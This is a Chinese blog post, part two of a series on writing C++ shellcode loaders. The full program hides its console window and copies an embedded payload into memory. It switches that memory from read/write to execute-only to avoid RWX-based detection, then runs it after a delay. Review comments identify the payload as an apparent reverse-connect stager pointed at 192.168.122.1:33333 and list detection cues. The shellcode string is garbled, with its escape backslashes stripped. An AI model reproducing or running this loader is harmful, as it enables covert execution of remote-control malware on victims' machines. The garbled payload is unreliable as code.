  • C++之加载器编写(二)

    #include <Windows.h>
    #include <stdio.h>
    using namespace std;
    
    #pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") 
    
    // Entry point of a minimal in-process payload runner: it copies an embedded byte blob into
    // newly committed memory, changes that memory from read/write to execute, waits, and calls it.
    // argc and argv are not used.
    //
    // Review notes (detection / triage):
    //  - The region is never writable and executable at the same time: it is allocated
    //    PAGE_READWRITE and later switched to PAGE_EXECUTE. Hunting only for
    //    PAGE_EXECUTE_READWRITE allocations therefore misses this listing; the observable
    //    events are the protection change to an executable value on private committed memory
    //    and the subsequent execution from a region with no backing image.
    //  - Neither VirtualAlloc nor VirtualProtect has its return value checked.
    int main(int argc, char **argv) {
    	DWORD dwOldProtect; // out-parameter: VirtualProtect stores the previous page protection here; never read afterwards
    	// NOTE(review): as extracted on this page the literal holds plain characters ('x', 'f', 'c', ...)
    	// rather than hex escapes, so what is shown is text, not a byte array.
    	// NOTE(review): read as hex bytes, the blob contains `68 33 32 00 00 68 77 73 32 5f`
    	// (a stack-built "ws2_32" string) and `68 c0 a8 7a 01` / `68 02 00 82 35`, which would be
    	// consistent with a socket-based stager pointed at 192.168.122.1:33333 -- confirm by
    	// disassembly in an isolated analysis environment before relying on this.
    	char ShellCode[] = "xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8bx52x30"
    		"x8bx52x0cx8bx52x14x31xffx0fxb7x4ax26x8bx72x28"
    		"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7x49"
    		"x75xefx52x8bx52x10x57x8bx42x3cx01xd0x8bx40x78"
    		"x85xc0x74x4cx01xd0x8bx48x18x8bx58x20x50x01xd3"
    		"x85xc9x74x3cx49x31xffx8bx34x8bx01xd6x31xc0xac"
    		"xc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24"
    		"x75xe0x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
    		"x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59"
    		"x5ax51xffxe0x58x5fx5ax8bx12xe9x80xffxffxffx5d"
    		"x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26"
    		"x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54x50x68"
    		"x29x80x6bx00xffxd5x6ax0ax68xc0xa8x7ax01x68x02"
    		"x00x82x35x89xe6x50x50x50x50x40x50x40x50x68xea"
    		"x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5x74x61"
    		"xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67x00x00"
    		"x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxffxd5x83"
    		"xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00x56x6a"
    		"x00x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57"
    		"x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58x68x00"
    		"x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57x68"
    		"x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85x70xff"
    		"xffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1xc3xbb"
    		"xf0xb5xa2x56x6ax00x53xffxd5";
    	void *exec = VirtualAlloc(NULL, sizeof ShellCode, MEM_COMMIT, PAGE_READWRITE);//only read/write protection is requested here; the result is not checked for NULL
    	//memcpy(exec, ShellCode, sizeof ShellCode);
    	CopyMemory(exec, ShellCode, sizeof ShellCode);//copy the array (terminating NUL included, per sizeof) into the read/write pages
    	VirtualProtect(exec, sizeof ShellCode, PAGE_EXECUTE, &dwOldProtect);//change the protection to execute-only; the BOOL result is ignored
    
    	// Pauses 3000 ms between the protection change and the call; the page gives no reason for the delay.
    	Sleep(3000);
    
    	// Casts the region to a pointer to a no-argument function and calls it; the return below is
    	// reached only if the called code returns.
    	((void(*)())exec)();
    	return 0;
    }
    
    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 原文地址:https://www.cnblogs.com/Yang34/p/14398664.html